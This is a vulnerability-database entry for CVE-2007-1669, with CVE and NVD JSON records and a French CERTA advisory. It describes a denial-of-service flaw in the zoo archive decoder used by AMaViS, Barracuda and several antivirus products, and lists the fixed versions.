CVE-2007-1669 (GCVE-0-2007-1669)

Vulnerability from cvelistv5 – Published: 2007-05-09 00:00 – Updated: 2024-08-07 13:06

Summary

Severity ?

No CVSS data available.

CWE

Assigner

mitre

References

URL

Tags

	http://www.amavis.org/security/asa-2007-2.txt	x_refsource_CONFIRM
	https://exchange.xforce.ibmcloud.com/vulnerabilit…	vdb-entryx_refsource_XF
	http://www.vupen.com/english/advisories/2007/1699	vdb-entryx_refsource_VUPEN
	http://www.securityfocus.com/bid/23823	vdb-entryx_refsource_BID
	http://www.attrition.org/pipermail/vim/2007-July/…	mailing-listx_refsource_VIM
	http://secunia.com/advisories/25315	third-party-advisoryx_refsource_SECUNIA
	http://www.securityfocus.com/archive/1/467646/100…	mailing-listx_refsource_BUGTRAQ
	http://secunia.com/advisories/25122	third-party-advisoryx_refsource_SECUNIA
	http://securityreason.com/securityalert/2680	third-party-advisoryx_refsource_SREASON
	http://www.osvdb.org/35795	vdb-entryx_refsource_OSVDB

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T13:06:25.797Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.amavis.org/security/asa-2007-2.txt"
          },
          {
            "name": "multiple-vendor-zoo-dos(34080)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
          },
          {
            "name": "ADV-2007-1699",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2007/1699"
          },
          {
            "name": "23823",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/23823"
          },
          {
            "name": "20070724 zoo - amavis - barracuda cross-ref problems",
            "tags": [
              "mailing-list",
              "x_refsource_VIM",
              "x_transferred"
            ],
            "url": "http://www.attrition.org/pipermail/vim/2007-July/001725.html"
          },
          {
            "name": "25315",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/25315"
          },
          {
            "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
          },
          {
            "name": "25122",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/25122"
          },
          {
            "name": "2680",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/2680"
          },
          {
            "name": "35795",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/35795"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-04-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-16T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.amavis.org/security/asa-2007-2.txt"
        },
        {
          "name": "multiple-vendor-zoo-dos(34080)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
        },
        {
          "name": "ADV-2007-1699",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2007/1699"
        },
        {
          "name": "23823",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/23823"
        },
        {
          "name": "20070724 zoo - amavis - barracuda cross-ref problems",
          "tags": [
            "mailing-list",
            "x_refsource_VIM"
          ],
          "url": "http://www.attrition.org/pipermail/vim/2007-July/001725.html"
        },
        {
          "name": "25315",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/25315"
        },
        {
          "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
        },
        {
          "name": "25122",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/25122"
        },
        {
          "name": "2680",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/2680"
        },
        {
          "name": "35795",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/35795"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-1669",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.amavis.org/security/asa-2007-2.txt",
              "refsource": "CONFIRM",
              "url": "http://www.amavis.org/security/asa-2007-2.txt"
            },
            {
              "name": "multiple-vendor-zoo-dos(34080)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080"
            },
            {
              "name": "ADV-2007-1699",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2007/1699"
            },
            {
              "name": "23823",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/23823"
            },
            {
              "name": "20070724 zoo - amavis - barracuda cross-ref problems",
              "refsource": "VIM",
              "url": "http://www.attrition.org/pipermail/vim/2007-July/001725.html"
            },
            {
              "name": "25315",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/25315"
            },
            {
              "name": "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/467646/100/0/threaded"
            },
            {
              "name": "25122",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/25122"
            },
            {
              "name": "2680",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/2680"
            },
            {
              "name": "35795",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/35795"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-1669",
    "datePublished": "2007-05-09T00:00:00",
    "dateReserved": "2007-03-24T00:00:00",
    "dateUpdated": "2024-08-07T13:06:25.797Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.17:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"7A9DC6C5-D228-43AC-8ED1-5A7E5315E275\"}, {\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.18:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"47F9E0B8-8BCF-4259-A415-909FD349DB2A\"}, {\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.0.54:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"159185A2-272C-46EC-A96A-84FB80B6473E\"}, {\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.01.001:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"4499AB68-D449-4A36-A243-F13F02C0EF95\"}, {\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.3:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"5BC3E5FA-1A08-4D4C-865E-547D50E21349\"}, {\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.053:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"E9E13260-BC29-45D9-98F3-0C2D7CF72A42\"}, {\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.055:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"3DB02038-4858-4D43-9FB6-492E131227CA\"}, {\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.15.026:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"FAA3E09E-6F3C-4ED9-AD6C-3F8938A629B2\"}, {\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.4:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"E5A431D3-D4D1-43F0-9D2F-C3D0CB58EA36\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"2.4.1\", \"matchCriteriaId\": \"64AF6FAE-B025-4F70-9F52-C7C12C6F705D\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.\"}, {\"lang\": \"es\", \"value\": \"zoo decoder versi\\u00f3n 2.10 (zoo-2.10), tal como se utiliza en m\\u00faltiples productos, incluyendo (1) Barracuda Spam Firewall versi\\u00f3n 3.4 y posterior con virusdef anterior a la versi\\u00f3n 2.0.6399, (2) Spam Firewall anterior a la versi\\u00f3n 3.4 20070319 con virusdef anterior a 2.0.6399o, y (3) AmaViS versi\\u00f3n 2.4.1 y anteriores, permite a atacantes remotos generar una denegaci\\u00f3n de servicio (bucle infinito) por medio del componente ZOO Archive con una estructura direntry que apunta hacia un archivo anterior.\"}]",
      "id": "CVE-2007-1669",
      "lastModified": "2024-11-21T00:28:53.433",
      "metrics": "{\"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:N/I:N/A:C\", \"baseScore\": 7.8, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"COMPLETE\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 6.9, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2007-05-09T00:19:00.000",
      "references": "[{\"url\": \"http://secunia.com/advisories/25122\", \"source\": \"cve@mitre.org\", \"tags\": [\"Patch\", \"Vendor Advisory\"]}, {\"url\": \"http://secunia.com/advisories/25315\", \"source\": \"cve@mitre.org\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://securityreason.com/securityalert/2680\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.amavis.org/security/asa-2007-2.txt\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.attrition.org/pipermail/vim/2007-July/001725.html\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.osvdb.org/35795\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.securityfocus.com/archive/1/467646/100/0/threaded\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://www.securityfocus.com/bid/23823\", \"source\": \"cve@mitre.org\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://www.vupen.com/english/advisories/2007/1699\", \"source\": \"cve@mitre.org\"}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/34080\", \"source\": \"cve@mitre.org\"}, {\"url\": \"http://secunia.com/advisories/25122\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\", \"Vendor Advisory\"]}, {\"url\": \"http://secunia.com/advisories/25315\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://securityreason.com/securityalert/2680\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.amavis.org/security/asa-2007-2.txt\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.attrition.org/pipermail/vim/2007-July/001725.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.osvdb.org/35795\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.securityfocus.com/archive/1/467646/100/0/threaded\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://www.securityfocus.com/bid/23823\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\"]}, {\"url\": \"http://www.vupen.com/english/advisories/2007/1699\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://exchange.xforce.ibmcloud.com/vulnerabilities/34080\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
      "sourceIdentifier": "cve@mitre.org",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"NVD-CWE-Other\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2007-1669\",\"sourceIdentifier\":\"cve@mitre.org\",\"published\":\"2007-05-09T00:19:00.000\",\"lastModified\":\"2025-04-09T00:30:58.490\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.\"},{\"lang\":\"es\",\"value\":\"zoo decoder versi\u00f3n 2.10 (zoo-2.10), tal como se utiliza en m\u00faltiples productos, incluyendo (1) Barracuda Spam Firewall versi\u00f3n 3.4 y posterior con virusdef anterior a la versi\u00f3n 2.0.6399, (2) Spam Firewall anterior a la versi\u00f3n 3.4 20070319 con virusdef anterior a 2.0.6399o, y (3) AmaViS versi\u00f3n 2.4.1 y anteriores, permite a atacantes remotos generar una denegaci\u00f3n de servicio (bucle infinito) por medio del componente ZOO Archive con una estructura direntry que apunta hacia un archivo anterior.\"}],\"metrics\":{\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:N/I:N/A:C\",\"baseScore\":7.8,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":6.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"NVD-CWE-Other\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.17:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"7A9DC6C5-D228-43AC-8ED1-5A7E5315E275\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.18:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"47F9E0B8-8BCF-4259-A415-909FD349DB2A\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.0.54:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"159185A2-272C-46EC-A96A-84FB80B6473E\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.01.001:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4499AB68-D449-4A36-A243-F13F02C0EF95\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.3:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"5BC3E5FA-1A08-4D4C-865E-547D50E21349\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.053:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E9E13260-BC29-45D9-98F3-0C2D7CF72A42\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.055:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"3DB02038-4858-4D43-9FB6-492E131227CA\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.15.026:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FAA3E09E-6F3C-4ED9-AD6C-3F8938A629B2\"},{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.4:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E5A431D3-D4D1-43F0-9D2F-C3D0CB58EA36\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"2.4.1\",\"matchCriteriaId\":\"64AF6FAE-B025-4F70-9F52-C7C12C6F705D\"}]}]}],\"references\":[{\"url\":\"http://secunia.com/advisories/25122\",\"source\":\"cve@mitre.org\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"http://secunia.com/advisories/25315\",\"source\":\"cve@mitre.org\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://securityreason.com/securityalert/2680\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.amavis.org/security/asa-2007-2.txt\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.attrition.org/pipermail/vim/2007-July/001725.html\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.osvdb.org/35795\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.securityfocus.com/archive/1/467646/100/0/threaded\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://www.securityfocus.com/bid/23823\",\"source\":\"cve@mitre.org\",\"tags\":[\"Exploit\"]},{\"url\":\"http://www.vupen.com/english/advisories/2007/1699\",\"source\":\"cve@mitre.org\"},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/34080\",\"source\":\"cve@mitre.org\"},{\"url\":\"http://secunia.com/advisories/25122\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Vendor Advisory\"]},{\"url\":\"http://secunia.com/advisories/25315\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://securityreason.com/securityalert/2680\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.amavis.org/security/asa-2007-2.txt\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.attrition.org/pipermail/vim/2007-July/001725.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.osvdb.org/35795\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/archive/1/467646/100/0/threaded\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://www.securityfocus.com/bid/23823\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\"]},{\"url\":\"http://www.vupen.com/english/advisories/2007/1699\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://exchange.xforce.ibmcloud.com/vulnerabilities/34080\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}"
  }
}

CERTA-2007-AVI-212

Vulnerability from certfr_avis - Published: - Updated:

Une vulnérabilité dans la gestion des archives au format zoo permet à un utilisateur malveillant de réaliser un déni de service à distance.

Description

Une vulnérabilité dans la gestion des archives au format zoo peut conduire à une boucle infinie et la consommation de toute la ressource processeur. Elle permet à un utilisateur malveillant de réaliser un déni de service à distance.

Solution

Se référer au bulletin de sécurité des éditeurs pour l'obtention des correctifs (cf. section Documentation).

Pour Avast!, migrer en version 4.7.981 ou ultérieure.

Pour Avira, migrer la bibliothèque avpack32.dll en version 7.3.0.6. La société annonce avoir corrigé la vulnérabilité de 22 mars 2007.

Pour Barracuda, migrer en firmware 3.4 ou ultérieur et en version de définition de virus 2.0.6399 ou ultérieure.

Pour Panda, la société annonce que la mise à jour corrigeant la vulnérabilité est automatique. Le correctif date du 02 avril 2007.

None

Impacted products

Vendor	Product	Description
N/A	N/A	Avira Antivir ;
Cisco	Small Business	Panda Antivirus Platinum 6.x et 7.x, Titanium, Entreprise Suite et Small Business Edition.
Cisco	N/A	Avast! home/professionnal 4.x ;
N/A	N/A	Barracuda Spam Firewall ;

References

Title

Publication Time

Tags

Bulletin de version Avast du 30 avril 2007 :	-	other
Bulletin de sécurité Barracuda du 04 mai 2007 :	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Avira Antivir ;",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "N/A",
          "scada": false
        }
      }
    },
    {
      "description": "Panda Antivirus Platinum 6.x et 7.x, Titanium, Entreprise Suite et Small Business Edition.",
      "product": {
        "name": "Small Business",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    },
    {
      "description": "Avast! home/professionnal 4.x ;",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    },
    {
      "description": "Barracuda Spam Firewall ;",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "N/A",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Description\n\nUne vuln\u00e9rabilit\u00e9 dans la gestion des archives au format zoo peut\nconduire \u00e0 une boucle infinie et la consommation de toute la ressource\nprocesseur. Elle permet \u00e0 un utilisateur malveillant de r\u00e9aliser un d\u00e9ni\nde service \u00e0 distance.\n\n## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 des \u00e9diteurs pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n\nPour Avast!, migrer en version 4.7.981 ou ult\u00e9rieure.\n\nPour Avira, migrer la biblioth\u00e8que avpack32.dll en version 7.3.0.6. La\nsoci\u00e9t\u00e9 annonce avoir corrig\u00e9 la vuln\u00e9rabilit\u00e9 de 22 mars 2007.\n\nPour Barracuda, migrer en firmware 3.4 ou ult\u00e9rieur et en version de\nd\u00e9finition de virus 2.0.6399 ou ult\u00e9rieure.\n\nPour Panda, la soci\u00e9t\u00e9 annonce que la mise \u00e0 jour corrigeant la\nvuln\u00e9rabilit\u00e9 est automatique. Le correctif date du 02 avril 2007.\n",
  "cves": [
    {
      "name": "CVE-2007-1671",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-1671"
    },
    {
      "name": "CVE-2007-1672",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-1672"
    },
    {
      "name": "CVE-2007-1669",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-1669"
    },
    {
      "name": "CVE-2007-1670",
      "url": "https://www.cve.org/CVERecord?id=CVE-2007-1670"
    }
  ],
  "links": [
    {
      "title": "Bulletin de version Avast du 30    avril 2007 :",
      "url": "http://www.avast.com/eng/avast-4-home_pro-revision-history.html"
    },
    {
      "title": "Bulletin de s\u00e9curit\u00e9 Barracuda    du 04 mai 2007 :",
      "url": "http://www.barracudanetworks.com/ns/resources/tech_alert.php"
    }
  ],
  "reference": "CERTA-2007-AVI-212",
  "revisions": [
    {
      "description": "version initiale.",
      "revision_date": "2007-05-09T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "D\u00e9ni de service \u00e0 distance"
    }
  ],
  "summary": "Une vuln\u00e9rabilit\u00e9 dans la gestion des archives au format zoo permet \u00e0 un\nutilisateur malveillant de r\u00e9aliser un d\u00e9ni de service \u00e0 distance.\n",
  "title": "Vuln\u00e9rabilit\u00e9 de plusieurs produits de s\u00e9curit\u00e9",
  "vendor_advisories": []
}

CERTA-2007-AVI-212

Vulnerability from certfr_avis - Published: - Updated:

Une vulnérabilité dans la gestion des archives au format zoo permet à un utilisateur malveillant de réaliser un déni de service à distance.

Description

Solution

Se référer au bulletin de sécurité des éditeurs pour l'obtention des correctifs (cf. section Documentation).

Pour Avast!, migrer en version 4.7.981 ou ultérieure.

Pour Avira, migrer la bibliothèque avpack32.dll en version 7.3.0.6. La société annonce avoir corrigé la vulnérabilité de 22 mars 2007.

Pour Barracuda, migrer en firmware 3.4 ou ultérieur et en version de définition de virus 2.0.6399 ou ultérieure.

Pour Panda, la société annonce que la mise à jour corrigeant la vulnérabilité est automatique. Le correctif date du 02 avril 2007.

None

Impacted products

Vendor	Product	Description
N/A	N/A	Avira Antivir ;
Cisco	Small Business	Panda Antivirus Platinum 6.x et 7.x, Titanium, Entreprise Suite et Small Business Edition.
Cisco	N/A	Avast! home/professionnal 4.x ;
N/A	N/A	Barracuda Spam Firewall ;

References

Title

Publication Time

Tags

Bulletin de version Avast du 30 avril 2007 :	-	other
Bulletin de sécurité Barracuda du 04 mai 2007 :	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Avira Antivir ;",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "N/A",
          "scada": false
        }
      }
    },
    {
      "description": "Panda Antivirus Platinum 6.x et 7.x, Titanium, Entreprise Suite et Small Business Edition.",
      "product": {
        "name": "Small Business",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    },
    {
      "description": "Avast! home/professionnal 4.x ;",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Cisco",
          "scada": false
        }
      }
    },
    {
      "description": "Barracuda Spam Firewall ;",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "N/A",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": null,
